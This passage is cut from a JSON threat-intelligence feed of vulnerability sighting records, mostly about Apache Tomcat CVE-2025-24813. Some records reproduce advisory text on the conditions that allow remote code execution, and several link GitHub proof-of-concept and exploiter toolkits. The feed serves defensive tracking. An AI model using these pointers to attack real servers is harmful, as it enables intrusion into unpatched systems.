DC/DC/DC RAIL (6AG2214-1AG40-1XB0), SIPLUS S7-1200 CPU 1214FC DC/DC/DC (6AG1214-1AF40-5XB0), SIPLUS S7-1200 CPU 1214FC DC/DC/RLY (6AG1214-1HF40-5XB0), SIPLUS S7-1200 CPU 1215 AC/DC/RLY (6AG1215-1BG40-2XB0), SIPLUS S7-1200 CPU 1215 AC/DC/RLY (6AG1215-1BG40-4XB0), SIPLUS S7-1200 CPU 1215 AC/DC/RLY (6AG1215-1BG40-5XB0), SIPLUS S7-1200 CPU 1215 DC/DC/DC (6AG1215-1AG40-2XB0), SIPLUS S7-1200 CPU 1215 DC/DC/DC (6AG1215-1AG40-4XB0), SIPLUS S7-1200 CPU 1215 DC/DC/RLY (6AG1215-1HG40-2XB0), SIPLUS S7-1200 CPU 1215 DC/DC/RLY (6AG1215-1HG40-4XB0), SIPLUS S7-1200 CPU 1215 DC/DC/RLY (6AG1215-1HG40-5XB0), SIPLUS S7-1200 CPU 1215C DC/DC/DC (6AG1215-1AG40-5XB0), SIPLUS S7-1200 CPU 1215FC DC/DC/DC (6AG1215-1AF40-5XB0). Affected devices do not process correctly certain special crafted packets sent to port 80/tcp, which could allow an unauthenticated attacker to cause a denial of service in the device. \nSeverity: 7.5 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"11 Feb 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-02-11T13:10:26.000000Z"}, {"uuid": "ffdcd099-52c1-4e35-9caf-5c8fffb6ccd9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24817", "type": "seen", "source": "Telegram/aEQe0P-AMU0sS3Jz8wP_VEzQz8QZjOsktArIVrJmPyKpvP4", "content": "", "creation_timestamp": "2026-04-08T23:32:24.000000Z"}, {"uuid": "95a7880c-3799-4dad-873d-065a2cb39ac5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24810", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3241", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24810\n\ud83d\udd25 CVSS Score: 4.2 (CVSS_V3)\n\ud83d\udd39 Description: Cross-site scripting vulnerability exists in Simple Image Sizes 3.2.3 and earlier. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who is logging in to the product with the administrative privilege and accessing the settings screen.\n\ud83d\udccf Published: 2025-01-28T06:30:40Z\n\ud83d\udccf Modified: 2025-01-28T06:30:40Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-24810\n2. https://jvn.jp/en/jp/JVN88046370\n3. https://wordpress.org/plugins/simple-image-sizes/#developers", "creation_timestamp": "2025-01-28T07:08:51.000000Z"}, {"uuid": "e994a746-9659-46c8-a0aa-2787512ae078", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7027", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24813\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: Path Equivalence: 'file.Name' (Internal Dot) leading to\u00a0Remote Code Execution and/or Information disclosure\u00a0and/or malicious content added to uploaded files via write enabled\u00a0Default Servlet\u00a0in Apache Tomcat.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.2, from 10.1.0-M1 through 10.1.34, from 9.0.0.M1 through 9.0.98.\n\nIf all of the following were true, a malicious user was able to view       security sensitive files and/or inject content into those files:\n-\u00a0writes enabled for the default servlet (disabled by default)\n- support for partial PUT (enabled by default)\n- a target URL for security sensitive uploads that was a sub-directory of\u00a0a target URL for public uploads\n-\u00a0attacker knowledge of the names of security sensitive files being\u00a0uploaded\n-\u00a0the security sensitive files also being uploaded via partial PUT\n\nIf all of the following were true, a malicious user was able to       perform remote code execution:\n- writes enabled for the default servlet (disabled by default)\n-\u00a0support for partial PUT (enabled by default)\n-\u00a0application was using Tomcat's file based session persistence with the\u00a0default storage location\n-\u00a0application included a library that may be leveraged in a\u00a0deserialization attack\n\nUsers are recommended to upgrade to version 11.0.3, 10.1.35 or 9.0.98, which fixes the issue.\n\ud83d\udccf Published: 2025-03-10T16:44:03.715Z\n\ud83d\udccf Modified: 2025-03-10T16:44:03.715Z\n\ud83d\udd17 References:\n1. https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq", "creation_timestamp": "2025-03-10T17:38:26.000000Z"}, {"uuid": "9a3a6ae3-b94c-4bb1-8586-63d91d878466", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/32683", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-24813\u7684vulhub\u73af\u5883\u7684POC\u811a\u672c\nURL\uff1ahttps://github.com/Erosion2020/CVE-2025-24813-vulhub\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-04-18T11:06:37.000000Z"}, {"uuid": "7dc07c54-4bdd-4e2d-85b9-8f082c684d3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3ltfep2o2py2b", "content": "", "creation_timestamp": "2025-07-07T18:03:43.863291Z"}, {"uuid": "46f3d205-2307-461a-96d9-532c32f12570", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/cybersecurity.page/post/3lmdxpuhneg2h", "content": "", "creation_timestamp": "2025-04-09T02:42:30.929821Z"}, {"uuid": "66687bb0-8a94-4839-af17-540b4d3c684c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lnaq4tzxg32x", "content": "", "creation_timestamp": "2025-04-20T13:13:53.173786Z"}, {"uuid": "60b65ce9-32ee-4663-9398-0bec6d02064d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/114705217531044379", "content": "", "creation_timestamp": "2025-06-18T16:05:19.814880Z"}, {"uuid": "41fbc0b0-8bea-4471-a88b-e0b2613677d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/securitycipher.bsky.social/post/3lnsjyt665u2j", "content": "", "creation_timestamp": "2025-04-27T15:12:07.085180Z"}, {"uuid": "a223985a-6865-41d1-9269-f8262d36c840", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-571c4095-786a21dfffbe298b", "content": "", "creation_timestamp": "2025-07-04T11:33:48.751516Z"}, {"uuid": "675cb31c-6baa-4419-b9e2-8536dead6920", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3ltet25lgj22o", "content": "", "creation_timestamp": "2025-07-07T12:47:51.498315Z"}, {"uuid": "80007f80-e189-4cce-a3a9-39582855511a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://unit42.paloaltonetworks.com/apache-cve-2025-24813-cve-2025-27636-cve-2025-29891/", "content": "", "creation_timestamp": "2025-07-03T08:00:03.000000Z"}, {"uuid": "71e3ff57-8f67-45eb-bfab-1dfe53533d18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/bolhasec.com/post/3lp5myjowbm2u", "content": "", "creation_timestamp": "2025-05-14T18:30:08.813909Z"}, {"uuid": "66e424b5-c8cd-4e20-8610-2a9ab7981319", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-09-28T08:23:31.000000Z"}, {"uuid": "3d1e0882-7be0-43cc-a9cb-ef4c366c1dca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-09-29T03:12:16.000000Z"}, {"uuid": "0be7e3eb-f672-4a6f-9fcf-9ce5ac138aef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/hacker.at.thenote.app/post/3mdy4an67zc2q", "content": "", "creation_timestamp": "2026-02-03T19:36:11.423367Z"}, {"uuid": "a693ab1d-a5e5-49d8-b91e-dee83f67fe68", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://gist.github.com/fernandinand/80cb943bc13477d76a3adff5cb86715c", "content": "", "creation_timestamp": "2026-04-22T13:26:30.000000Z"}, {"uuid": "4b34ec25-f48e-4483-ac1f-09dcd954f13e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/fe473d70-7fe2-43e9-bd35-c8b91546205c", "content": "", "creation_timestamp": "2026-02-02T12:26:04.406426Z"}, {"uuid": "9935d51b-f6b9-4bed-b743-89de2483f540", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://github.com/range42/range42-catalog/tree/main/03_container_layer/docker/_ctf/cve/web/tomcat/CVE-2025-24813", "content": "", "creation_timestamp": "2026-04-15T14:28:37.196196Z"}, {"uuid": "d9ec38b7-ba85-4f4d-8dd7-362ba60414af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=1497", "content": "", "creation_timestamp": "2025-03-11T04:00:00.000000Z"}, {"uuid": "8eb26ba1-aa20-4ee1-b691-8acd735047ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/8b291831-2785-48c5-bce6-8e1ad5925260", "content": "", "creation_timestamp": "2026-03-19T14:30:50.500201Z"}, {"uuid": "3e714172-148f-4d9c-b3f9-405f502e36d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/L38WC5Z6StDAbVGWur3J1et47qVqp8n45yINKLUpuArTxNY", "content": "", "creation_timestamp": "2025-12-23T15:00:07.000000Z"}, {"uuid": "b3250d5d-3cad-4544-bb60-c70d421d8fbd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/wPxuKkvaeObl7wP7fVpj1j1W_8mLNT5U7Q8iJzLFoolh0zg", "content": "", "creation_timestamp": "2025-06-21T21:00:05.000000Z"}, {"uuid": "9d4055b4-5c68-46bb-b1d4-00098c6d906c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://t.me/cvedetector/19979", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-24813 - Apache Tomcat Default Servlet Path Equivalence Remote Code Execution and Information Disclosure\", \n  \"Content\": \"CVE ID : CVE-2025-24813 \nPublished : March 10, 2025, 5:15 p.m. | 2\u00a0hours, 7\u00a0minutes ago \nDescription : Path Equivalence: 'file.Name' (Internal Dot) leading to\u00a0Remote Code Execution and/or Information disclosure\u00a0and/or malicious content added to uploaded files via write enabled\u00a0Default Servlet\u00a0in Apache Tomcat.  \n  \nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.2, from 10.1.0-M1 through 10.1.34, from 9.0.0.M1 through 9.0.98.  \n  \nIf all of the following were true, a malicious user was able to view       security sensitive files and/or inject content into those files:  \n-\u00a0writes enabled for the default servlet (disabled by default)  \n- support for partial PUT (enabled by default)  \n- a target URL for security sensitive uploads that was a sub-directory of\u00a0a target URL for public uploads  \n-\u00a0attacker knowledge of the names of security sensitive files being\u00a0uploaded  \n-\u00a0the security sensitive files also being uploaded via partial PUT  \n  \nIf all of the following were true, a malicious user was able to       perform remote code execution:  \n- writes enabled for the default servlet (disabled by default)  \n-\u00a0support for partial PUT (enabled by default)  \n-\u00a0application was using Tomcat's file based session persistence with the\u00a0default storage location  \n-\u00a0application included a library that may be leveraged in a\u00a0deserialization attack  \n  \nUsers are recommended to upgrade to version 11.0.3, 10.1.35 or 9.0.98, which fixes the issue. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"10 Mar 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-03-10T20:43:09.000000Z"}, {"uuid": "4c159bf9-e061-4f51-bd1c-520fa6877448", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/0jvjkPEZnoW_0g8cjJAx2BIIU7bcv6ZLASQZj1TPT87LGFs", "content": "", "creation_timestamp": "2025-07-19T21:00:04.000000Z"}, {"uuid": "e86fd79b-25fa-4b0b-ac55-777ac73588a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/54272", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aApache (CVE-2025-24813) GOExploiter Checker &amp; Exploiter very Fast \nURL\uff1ahttps://github.com/drcrypterdotru/Apache-GOExploiter\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-10-05T12:27:43.000000Z"}, {"uuid": "c66bb382-6cdd-45d4-a94b-8ae3554e9197", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/20923", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aApache Tomcat Vulnerability POC (CVE-2025-24813)\nURL\uff1ahttps://github.com/michael-david-fry/Apache-Tomcat-Vulnerability-POC-CVE-2025-24813-\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-03-19T14:39:08.000000Z"}, {"uuid": "b489d8a9-9ff0-4569-ba25-4da99a45dcb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24818", "type": "published-proof-of-concept", "source": "Telegram/UCQVBQ1wk3sWuk0eQ1N0bHldnYCTUsbgi6Jx-voi5Wevn8w", "content": "", "creation_timestamp": "2026-04-07T23:20:49.000000Z"}, {"uuid": "81a45c86-4460-4837-8596-92351aa14cac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/28884", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aThis repository contains a shell script based POC on Apache Tomcat CVE-2025-24813.  It allow you to easily test the vulnerability on any version of Apache Tomcat\nURL\uff1ahttps://github.com/manjula-aw/CVE-2025-24813\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-04-02T06:30:19.000000Z"}, {"uuid": "1d64ad60-f8cf-4e0f-860b-5bc64eca09af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3llubw2vikt2i", "content": "", "creation_timestamp": "2025-04-02T21:02:22.082681Z"}, {"uuid": "a6e2c7b8-3d7a-4d87-ab2d-463f11c5cf59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lluei5bhs22a", "content": "", "creation_timestamp": "2025-04-02T21:48:15.544266Z"}, {"uuid": "cd54f2fa-0f1e-4a36-9788-b75dc873ee5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3llutdd7rme2r", "content": "", "creation_timestamp": "2025-04-03T02:13:59.495506Z"}, {"uuid": "874706f8-234e-45e2-a076-8d643d00b4ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3llwsemlwyu25", "content": "", "creation_timestamp": "2025-04-03T21:02:13.678774Z"}, {"uuid": "9b878c03-cd78-4a75-a9e3-e7dd59c64673", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lmdep7kmom2t", "content": "", "creation_timestamp": "2025-04-08T21:02:10.789639Z"}, {"uuid": "331834dd-921e-4cf3-a141-884c2a7d9bb1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-09)", "content": "", "creation_timestamp": "2025-04-09T00:00:00.000000Z"}, {"uuid": "84d39c05-a32c-4884-9cda-8c441b3733a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-12)", "content": "", "creation_timestamp": "2025-04-12T00:00:00.000000Z"}, {"uuid": "855f4086-4d82-4249-aa41-0adf02e0cdc2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://bsky.app/profile/cti-news.bsky.social/post/3lt2if2lwxt2r", "content": "", "creation_timestamp": "2025-07-03T10:10:26.270242Z"}, {"uuid": "d6375e95-a808-4645-a0b1-c52f2574ae59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/pigondrugs.bsky.social/post/3lt2qfcrqp22u", "content": "", "creation_timestamp": "2025-07-03T12:33:44.737073Z"}, {"uuid": "dcbd0d56-34a5-4d69-94f4-f0d060113c66", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114789378245748413", "content": "", "creation_timestamp": "2025-07-03T12:48:30.075235Z"}, {"uuid": "a79c2fc4-b71e-4dd8-a749-29c63d9de54b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "MISP/a9d21043-f825-4bac-8d2b-56fb9e8343e7", "content": "", "creation_timestamp": "2025-10-23T21:13:04.000000Z"}, {"uuid": "24ba1469-debc-4006-a645-96216cc9332d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-17)", "content": "", "creation_timestamp": "2025-11-17T00:00:00.000000Z"}, {"uuid": "918eb1f5-c8ec-47ff-9ce3-31f1ce9f1435", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-20)", "content": "", "creation_timestamp": "2025-11-20T00:00:00.000000Z"}, {"uuid": "0b603489-9d0f-4af7-9612-3a54fc71f1f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-22)", "content": "", "creation_timestamp": "2025-11-22T00:00:00.000000Z"}, {"uuid": "9f39a69c-6e9f-4292-9ab6-57bfd3a00892", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-25)", "content": "", "creation_timestamp": "2025-11-25T00:00:00.000000Z"}, {"uuid": "2d5ed2be-3cc4-41f3-af8a-d484a40b09ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-11-24)", "content": "", "creation_timestamp": "2025-11-24T00:00:00.000000Z"}, {"uuid": "abb14e60-47d8-4372-9070-496774aa18f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-18)", "content": "", "creation_timestamp": "2025-12-18T00:00:00.000000Z"}, {"uuid": "76303d88-5dbc-4748-82dd-ed8a62e69138", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/hackernoon.com/post/3mdvqlpigym2i", "content": "", "creation_timestamp": "2026-02-02T21:02:18.768360Z"}, {"uuid": "748f4c5f-ecd8-4515-93ac-6451ece6bd9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/fe473d70-7fe2-43e9-bd35-c8b91546205c", "content": "", "creation_timestamp": "2026-02-02T12:26:04.406426Z"}, {"uuid": "dea96d95-428d-4c44-b220-5a2421dc6a68", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/2uioG1MInf7UvL10ReoF_aKQ3FrQ1V6xyfJ0eyTqrtyfxcM", "content": "", "creation_timestamp": "2025-12-27T03:21:05.000000Z"}, {"uuid": "8ca170a7-adf5-4dbc-acc4-823575627827", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/vGftsyUiEMeyjPcl2UtvJfMNUjwCrmwOhiCYLQD2SH3tqAc", "content": "", "creation_timestamp": "2025-12-10T15:00:07.000000Z"}, {"uuid": "c8d69c3b-7156-4141-8a82-06a6f83a24c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/7omxUZ2uMXoER28uRMclbQ_dLv3_MyobI63W53jiSYQupcI", "content": "", "creation_timestamp": "2025-09-15T03:00:05.000000Z"}, {"uuid": "a1acb095-f6a1-47b7-b123-9eeccd6ac4e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/50103", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1a\ud83d\udee0 Exploit vulnerable Apache Tomcat servers by scanning for CVE-2025-24813 and uploading files with this Go-based toolkit.\nURL\uff1ahttps://github.com/Olabanji10/Apache-GOExploiter\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-09-03T10:35:25.000000Z"}, {"uuid": "88827118-2a5b-49f2-80ef-8aa5924c7567", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/ktfF1YjAfTgGnV4T6AQBqxJFytPD6zIUM1POBEH3rhcPUWE", "content": "", "creation_timestamp": "2025-09-03T15:00:07.000000Z"}, {"uuid": "a6abe17a-f758-4e98-9923-9c5c3a24b98f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/50108", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aThis is a PoC 